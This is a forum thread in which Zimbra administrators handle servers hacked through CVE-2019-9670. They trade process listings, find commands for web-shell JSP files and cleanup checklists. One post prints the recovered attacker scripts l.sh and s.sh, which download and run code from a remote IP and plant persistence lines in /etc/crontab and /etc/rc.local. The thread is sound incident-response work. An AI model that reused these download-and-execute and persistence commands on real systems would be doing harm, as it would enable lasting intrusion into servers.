I found jsp files also in the folder /opt/zimbra/jetty/webapps/zimbra/img/.
I think that jsp files can be found in every folder that can be accessed from internet.
A very dangerous file is ZimbraApps.jsp that is http://freshmeat.sourceforge.net/projects/jspbrowser
and allow to browse almost the entire filesystem
You cab also search for recent files using
find /opt/zimbra/jetty/ -name "*.jsp" -mtime -15 -ls
In general you can look at .jsp and -sh files to search for zimbra (and maybe) also system folders where scripts or jsp was downloaded.
You can grep for calls in /opt/zimbra/log/access_log.2019* files to find for commands issued.
On compromised systems, with a very lot of attention, a good idea is to use zmldappasswd to change ldap passwords, because they are stored in clear text in the /opt/zimbra/conf
Hope that helps
CVE-2019-9670 being actively exploited (Hacked Server)
Re: CVE-2019-9670 being actively exploited
I found on my server. And yes, it has /tmp/zmcat binary file and /tmp/l.sh and /tmp/s.sh shell files (for it content see blow)
Zimbra version: 8.7.11_GA_3706
Zimbra version: 8.7.11_GA_3706
Code: Select all
ps -aefH
root 18242 1 0 мар23 ? 00:00:00 /opt/zimbra/libexec/zmmailboxdmgr start -Dfile.encoding=UTF-8 -server -Dhttps.protocols=TLSv1,TLSv1
zimbra 18243 18242 13 мар23 ? 2-03:28:38 /opt/zimbra/common/bin/java -Dfile.encoding=UTF-8 -server -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1
zimbra 15461 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15490 15461 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15527 15490 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 9426 15527 0 апр04 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 15465 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15501 15465 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15551 15501 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 9405 15551 0 апр04 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 15469 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15497 15469 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15627 15497 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 9450 15627 0 апр04 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 15472 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15508 15472 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15629 15508 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 15481 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15590 15481 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15600 15590 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 9411 15600 0 апр04 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 15485 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15691 15485 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15771 15691 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 9496 15771 0 апр04 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 15584 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15685 15584 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15755 15685 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 9486 15755 0 апр04 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 15585 18243 0 апр04 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 15676 15585 0 апр04 ? 00:00:00 sh /tmp/s.sh
zimbra 15710 15676 0 апр04 ? 00:00:00 bash /tmp/l.sh
zimbra 28882 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 28915 28882 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 29110 28915 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 16398 29110 0 17:33 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 28885 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 28924 28885 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 29074 28924 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 16428 29074 0 17:33 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 28889 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 29065 28889 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 29086 29065 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 16509 29086 0 17:33 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 28895 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 28935 28895 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 28961 28935 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 28900 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 28944 28900 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 28978 28944 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 28906 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 28952 28906 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 29011 28952 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 16494 29011 0 17:33 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 28910 18243 0 17:14 ? 00:00:00 /bin/sh -c wget http://181.148.183.75/reports/s.sh -O /tmp/s.sh;curl http://181.148.183.75/repo
zimbra 29150 28910 0 17:14 ? 00:00:00 sh /tmp/s.sh
zimbra 29159 29150 0 17:14 ? 00:00:00 bash /tmp/l.sh
zimbra 16451 29159 0 17:33 ? 00:00:00 sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra 18523 1 0 мар23 ? 00:08:18 /opt/zimbra/common/bin/memcached -d -P /opt/zimbra/log/memcached.pid -l 127.0.0.1 -p 11211
zimbra 18542 1 0 мар23 ? 00:00:00 nginx: master process /opt/zimbra/common/sbin/nginx -c /opt/zimbra/conf/nginx.conf
zimbra 18543 18542 0 мар23 ? 01:43:29 nginx: worker process
zimbra 18544 18542 0 мар23 ? 01:43:27 nginx: worker process
zimbra 18545 18542 0 мар23 ? 01:42:28 nginx: worker process
zimbra 18546 18542 0 мар23 ? 01:46:26 nginx: worker process
zimbra 19102 1 1 мар23 ? 04:38:13 /opt/zimbra/common/sbin/clamd --config-file=/opt/zimbra/conf/clamd.conf
zimbra 19118 1 0 мар23 ? 00:00:54 /opt/zimbra/common/bin/freshclam --config-file=/opt/zimbra/conf/freshclam.conf --quiet --daemon --c
zimbra 19122 1 0 мар23 ? 00:00:00 /opt/zimbra/common/sbin/opendkim -x /opt/zimbra/conf/opendkim.conf -u zimbra
zimbra 19124 19122 0 мар23 ? 00:05:30 /opt/zimbra/common/sbin/opendkim -x /opt/zimbra/conf/opendkim.conf -u zimbra
zimbra 19165 1 0 мар23 ? 00:01:43 /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra 19166 19165 0 мар23 ? 00:00:00 /opt/zimbra/common/bin/rotatelogs /opt/zimbra/log/httpd_error.log.%Y-%m-%d 86400
zimbra 19167 19165 0 мар23 ? 00:00:00 /opt/zimbra/common/bin/rotatelogs /opt/zimbra/log/httpd_access.log.%Y-%m-%d 86400
zimbra 19169 19165 0 мар23 ? 00:08:11 /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra 19171 19165 0 мар23 ? 00:08:16 /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra 19172 19165 0 мар23 ? 00:08:05 /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra 11443 19165 0 мар24 ? 00:07:27 /opt/zimbra/common/bin/httpd -k start -f /opt/zimbra/conf/httpd.conf
zimbra 19338 1 0 мар23 ? 02:09:19 /opt/zimbra/common/lib/jvm/java/bin/java -XX:ErrorFile=/opt/zimbra/log -client -Xmx256m -Dhttps.pro
zimbra 19350 1 0 мар23 ? 00:00:32 /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra 19368 19350 0 мар23 ? 00:00:31 /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra 19369 19350 0 мар23 ? 00:00:31 /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra 19370 19350 0 мар23 ? 00:00:31 /opt/zimbra/common/sbin/saslauthd -r -a zimbra
zimbra 19371 19350 0 мар23 ? 00:00:32 /opt/zimbra/common/sbin/saslauthd -r -a zimbra
root 19516 1 0 мар23 ? 00:07:47 /opt/zimbra/common/libexec/master -w
postfix 19518 19516 0 мар23 ? 00:01:41 qmgr -l -t unix -u
postfix 21295 19516 0 мар23 ? 00:00:38 tlsmgr -l -t unix -u
postfix 25125 19516 0 мар27 ? 00:07:43 postscreen -l -n smtp -t inet -u
postfix 25128 19516 0 мар27 ? 00:03:07 anvil -l -t unix -u
postfix 31671 19516 0 22:06 ? 00:00:00 pickup -l -t unix -u
postfix 9701 19516 0 22:18 ? 00:00:00 showq -t unix -u
postfix 1256 19516 0 22:44 ? 00:00:00 proxymap -t unix -u
postfix 8078 19516 0 22:53 ? 00:00:00 trivial-rewrite -n rewrite -t unix -u
postfix 8079 19516 0 22:53 ? 00:00:00 cleanup -z -t unix -u
postfix 8080 19516 0 22:53 ? 00:00:00 smtp -n smtp-amavis -t unix -u -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -
postfix 11097 19516 0 22:56 ? 00:00:00 trivial-rewrite -n rewrite -t unix -u
postfix 11098 19516 0 22:56 ? 00:00:00 proxymap -t unix -u
postfix 11100 19516 0 22:56 ? 00:00:00 proxymap -t unix -u
postfix 11102 19516 0 22:56 ? 00:00:00 cleanup -z -t unix -u
postfix 11103 19516 0 22:56 ? 00:00:00 smtp -n smtp-amavis -t unix -u -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -
postfix 11108 19516 0 22:56 ? 00:00:00 smtpd -n [127.0.0.1]:10025 -t inet -u -o content_filter= -o local_recipient_maps= -o virtual_mail
postfix 11110 19516 0 22:56 ? 00:00:00 smtpd -n [127.0.0.1]:10025 -t inet -u -o content_filter= -o local_recipient_maps= -o virtual_mail
postfix 11112 19516 0 22:56 ? 00:00:00 lmtp -t unix -u
postfix 12948 19516 1 22:58 ? 00:00:00 smtpd -t pass -u -o stress= -o smtpd_tls_security_level=may -o content_filter=scan:[127.0.0.1]:10
postfix 12949 19516 1 22:58 ? 00:00:00 smtpd -t pass -u -o stress= -o smtpd_tls_security_level=may -o content_filter=scan:[127.0.0.1]:10
zimbra 19580 1 0 мар23 ? 00:08:30 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-proc
zimbra 19582 1 0 мар23 ? 00:01:23 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-cpu
zimbra 19584 1 0 мар23 ? 00:01:15 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-vm
zimbra 21233 19584 0 мар23 ? 00:00:15 /usr/bin/vmstat -n -S K 30
zimbra 19586 1 0 мар23 ? 00:00:37 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-io -x
zimbra 21236 19586 0 мар23 ? 00:00:27 /usr/bin/iostat -d -k -x 30
zimbra 19588 1 0 мар23 ? 00:00:06 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-df
zimbra 19590 1 0 мар23 ? 00:00:36 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-io
zimbra 21235 19590 0 мар23 ? 00:00:25 /usr/bin/iostat -d -k 30
zimbra 19592 1 0 мар23 ? 00:00:00 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-fd
root 20459 19592 0 мар23 ? 00:00:00 sudo /opt/zimbra/libexec/zmstat-fd
root 20460 20459 0 мар23 ? 00:03:04 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-fd
zimbra 19596 1 0 мар23 ? 00:39:27 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-allprocs
zimbra 19617 1 0 мар23 ? 00:04:07 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-mysql
zimbra 19628 1 0 мар23 ? 00:01:11 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-mtaqueue
zimbra 19659 1 0 мар23 ? 00:14:17 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-nginx
zimbra 19662 1 0 мар23 ? 00:14:05 /usr/bin/perl -w /opt/zimbra/libexec/zmstat-ldap
zimbra 29900 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 29919 29900 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 17860 29919 0 апр02 ? 00:00:00 sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra 29913 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 29937 29913 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 29965 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 29975 29965 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 30013 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 30022 30013 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 30051 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 30060 30051 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 30090 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 30099 30090 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 30127 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 30136 30127 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 26749 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 26772 26749 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 26762 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 26774 26762 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 26843 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 26852 26843 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 14204 26852 0 апр02 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 26889 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 26910 26889 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 26901 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 26944 26901 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 26917 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 26969 26917 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 27001 1 0 апр02 ? 00:00:00 sh /tmp/s.sh
zimbra 27011 27001 0 апр02 ? 00:00:00 bash /tmp/l.sh
zimbra 25087 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 25100 25087 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 25228 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 25269 25228 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 25297 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 25330 25297 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 25357 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 25368 25357 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 25425 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 25450 25425 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 25441 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 25474 25441 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 8358 25474 0 апр03 ? 00:00:00 sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra 23473 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 23498 23473 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 23481 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 23522 23481 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 23485 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 23531 23485 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 1209 23531 0 апр03 ? 00:00:00 sed -i s/exit 0//g /etc/rc.local
zimbra 23614 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 23642 23614 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 1361 23642 0 апр03 ? 00:00:00 sed -i s/bash /tmp/lower.sh//g /etc/rc.local
zimbra 23624 1 0 апр03 ? 00:00:00 sh /tmp/s.sh
zimbra 23650 23624 0 апр03 ? 00:00:00 bash /tmp/l.sh
zimbra 8807 1 0 00:45 ? 00:00:01 /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-mc
zimbra 8811 8807 0 00:45 ? 00:03:10 /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-services msg-forwarder
zimbra 8812 8807 0 00:45 ? 00:00:37 /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-services childproc-minder
zimbra 8813 8807 0 00:45 ? 00:00:33 /usr/bin/perl -T /opt/zimbra/common/sbin/amavis-services snmp-responder
zimbra 8844 1 0 00:45 ? 00:00:03 /opt/zimbra/common/sbin/amavisd (master)
zimbra 18833 8844 0 21:15 ? 00:00:07 /opt/zimbra/common/sbin/amavisd (ch12-avail)
zimbra 20933 8844 0 21:17 ? 00:00:11 /opt/zimbra/common/sbin/amavisd (ch19-avail)
zimbra 26051 8844 0 21:23 ? 00:00:10 /opt/zimbra/common/sbin/amavisd (ch18-avail)
zimbra 31482 8844 0 21:29 ? 00:00:05 /opt/zimbra/common/sbin/amavisd (ch12-avail)
zimbra 5223 8844 0 21:36 ? 00:00:10 /opt/zimbra/common/sbin/amavisd (ch18-avail)
zimbra 11989 8844 0 21:44 ? 00:00:07 /opt/zimbra/common/sbin/amavisd (ch16-avail)
zimbra 29403 8844 0 22:04 ? 00:00:03 /opt/zimbra/common/sbin/amavisd (ch9-avail)
zimbra 8966 8844 0 22:17 ? 00:00:04 /opt/zimbra/common/sbin/amavisd (ch8-avail)
zimbra 13540 8844 0 22:22 ? 00:00:04 /opt/zimbra/common/sbin/amavisd (ch8-avail)
zimbra 5857 8844 0 22:50 ? 00:00:00 /opt/zimbra/common/sbin/amavisd (ch1-avail)
zimbra 25153 1 0 03:31 ? 00:07:24 /opt/zimbra/common/lib/jvm/java/bin/java -XX:ErrorFile=/opt/zimbra/log -client -Xmx256m -Dhttps.pro
zimbra 26572 1 0 03:31 ? 00:00:42 /opt/zimbra/common/bin/swatchdog --config-file=/opt/zimbra/conf/logswatchrc --use-cpan-file-tail --
zimbra 26573 26572 0 03:31 ? 00:01:17 /usr/bin/perl /opt/zimbra/libexec/zmlogger
zimbra 26693 26573 0 03:31 ? 00:00:00 zmlogger: zmrrdfetch: server
zimbra 26709 1 0 03:31 ? 00:00:00 /usr/bin/perl /opt/zimbra/common/bin/swatchdog --config-file=/opt/zimbra/conf/swatchrc --use-cpan-f
zimbra 26718 26709 0 03:31 ? 00:02:10 /usr/bin/perl /opt/zimbra/data/tmp/.swatchdog_script.26709
root 14997 1 0 04:30 ? 00:10:31 /usr/bin/python2 -s /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ba
[root@mail zimbra]#Code: Select all
[root@mail ~]# less /tmp/l.sh
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/zimbra/bin
function kills() {
/bin/ps aux |grep -v zmcat | awk '{if($3>50.0) print $2}' | while read procid
do
kill -9 $procid
done
}
function writecrontab() {
xcrontab=$(cat /etc/crontab | grep "http://181.148.183.75/reports/l.sh" | grep -v grep |wc -l)
if [ $xcrontab -eq 0 ];then
echo "0 0 * * * root curl http://181.148.183.75/reports/l.sh -L > /tmp/l.sh ; wget -P /tmp/ http://181.148.183.75/reports/l.sh ; rm /tmp/l.sh.* ; bash /tmp/l.sh &" >> /etc/crontab
else
echo ""
fi
}
function writerc() {
x=$(cat /etc/rc.local | grep "http://181.148.183.75/reports/l.sh" | grep -v grep | wc -l)
if [ $x -eq 0 ];then
$(sed -i "s/exit 0//g" /etc/rc.local)
$(sed -i "s/bash /tmp/lower.sh//g" /etc/rc.local)
echo "curl http://181.148.183.75/reports/l.sh -L > /tmp/l.sh ; wget -P /tmp/ http://181.148.183.75/reports/l.sh ; rm /tmp/l.sh.* ; bash /tmp/l.sh" >> /etc/rc.local
echo "exit 0" >> /etc/rc.local
else
echo ""
fiCode: Select all
[root@mail ~]# less /tmp/s.sh
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/zimbra/bin
/usr/bin/pkill -f "185.106.120.118"
/bin/ps aux | grep -v zmcat | awk '{if($3>50.0) print $2}' | while read procid
do
/bin/kill -9 $procid
done
whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
echo "user"
curl --connect-timeout 30 --max-time 30 --retry 3 http://181.148.183.75/reports/l.sh -o /tmp/l.sh
if [ ! -f "/tmp/l.sh" ] ;then
wget http://181.148.183.75/reports/l.sh -P /tmp/
rm /tmp/l.sh.*
fi
chmod 777 /tmp/l.sh
bash /tmp/l.sh
else
curl --connect-timeout 30 --max-time 30 --retry 3 http://181.148.183.75/reports/l.sh -o /tmp/l.sh
if [ ! -f "/etc/root.sh" ] ;then
wget http://181.148.183.75/reports/r.sh -O /etc/root.sh
rm /etc/root.sh.*
fi
chmod 777 /etc/root.sh
bash /etc/root.sh
fi
echo "over"Re: CVE-2019-9670 being actively exploited
Is there way to know about new patches (via rss, maillist, zabbix web page monitor, etc) for specific zimbra version?
Thanks
Thanks
Re: CVE-2019-9670 being actively exploited
rss: https://blog.zimbra.com/yeeP6rai wrote:Is there way to know about new patches (via rss, maillist, zabbix web page monitor, etc) for specific zimbra version?
Re: CVE-2019-9670 being actively exploited
Thank you!maxxer wrote:rss: https://blog.zimbra.com/yeeP6rai wrote:Is there way to know about new patches (via rss, maillist, zabbix web page monitor, etc) for specific zimbra version?
Re: CVE-2019-9670 being actively exploited
Other than this users found malicious .java files.lfasci wrote:You cab also search for recent files using
find /opt/zimbra/jetty/ -name "*.jsp" -mtime -15 -ls
Additionally to the one above also this find should be run:
Code: Select all
find /opt/zimbra/jetty/ -name "*_jsp.java" -mtime -15 -ls Re: CVE-2019-9670 being actively exploited
I myself found also some .class files named after the compromised .java ones
Re: CVE-2019-9670 being actively exploited
Yes... Thanksmaxxer wrote:Other than this users found malicious .java files.lfasci wrote:You cab also search for recent files using
find /opt/zimbra/jetty/ -name "*.jsp" -mtime -15 -ls
Additionally to the one above also this find should be run:
Code: Select all
find /opt/zimbra/jetty/ -name "*_jsp.java" -mtime -15 -ls
[root@mail ~]# find /opt/zimbra/jetty/ -name "*_jsp.java" -mtime -15 -ls
27160940 8 -rw-r----- 1 zimbra zimbra 5699 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img/_3trc_jsp.java
27160948 8 -rw-r----- 1 zimbra zimbra 5699 апр 2 23:28 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img/_59fk_jsp.java
27160941 8 -rw-r----- 1 zimbra zimbra 5698 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img/HMtq_jsp.java
23333748 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 11:46 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/AVj2_jsp.java
23333297 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:48 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/J7To_jsp.java
23331626 8 -rw-r----- 1 zimbra zimbra 5212 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/_8rcg_jsp.java
23331318 8 -rw-r----- 1 zimbra zimbra 5211 апр 2 23:27 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/aWbc_jsp.java
23335475 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:57 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/B9uH_jsp.java
23331332 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 11:46 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/Yo5h_jsp.java
23331505 8 -rw-r----- 1 zimbra zimbra 4940 мар 28 11:46 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/_9gHM_jsp.java
23333290 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:48 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/zqnl_jsp.java
23333028 8 -rw-r----- 1 zimbra zimbra 4939 мар 28 12:54 /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/pDvJ_jsp.java
Re: CVE-2019-9670 being actively exploited
along with them I found also some .class files with the same basename of .javayeeP6rai wrote:Yes... Thanks
-
pup_seba
- Outstanding Member
- Posts: 687
- Joined: Sat Sep 13, 2014 2:43 am
- Location: Tarragona - Spain
- Contact:
Re: CVE-2019-9670 being actively exploited
So, based on your findings so far, we should be looking for these things:
--> Recursevly under /opt/zimbra/jetty/ (so far things were found under /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/ and under /opt/zimbra/jetty/webapps/zimbra/downloads)
- Weird (random named) files with ".jsp" extension
- Weird files (random named) named with "_jsp.java" or "_jsp.class" at the end of them.
--> Under /tmp
- zmcat
- l.sh
- s.sh
--> Verify for "weird" accounts in zimbra. At least for one of my customers their scripts weren't able to delete those accounts once created.
--> Verify that /etc/crontab and /etc/rc.local are "clean".
The jsp files I found are for that reverse cmd thing. Are the ones you find also for that? As maybe we could also search (grep) for some part of its content, as a reinforcement for al the 'finds' being executed.
Thank you guys!
--> Recursevly under /opt/zimbra/jetty/ (so far things were found under /opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/downloads/ and under /opt/zimbra/jetty/webapps/zimbra/downloads)
- Weird (random named) files with ".jsp" extension
- Weird files (random named) named with "_jsp.java" or "_jsp.class" at the end of them.
--> Under /tmp
- zmcat
- l.sh
- s.sh
--> Verify for "weird" accounts in zimbra. At least for one of my customers their scripts weren't able to delete those accounts once created.
--> Verify that /etc/crontab and /etc/rc.local are "clean".
The jsp files I found are for that reverse cmd thing. Are the ones you find also for that? As maybe we could also search (grep) for some part of its content, as a reinforcement for al the 'finds' being executed.
Thank you guys!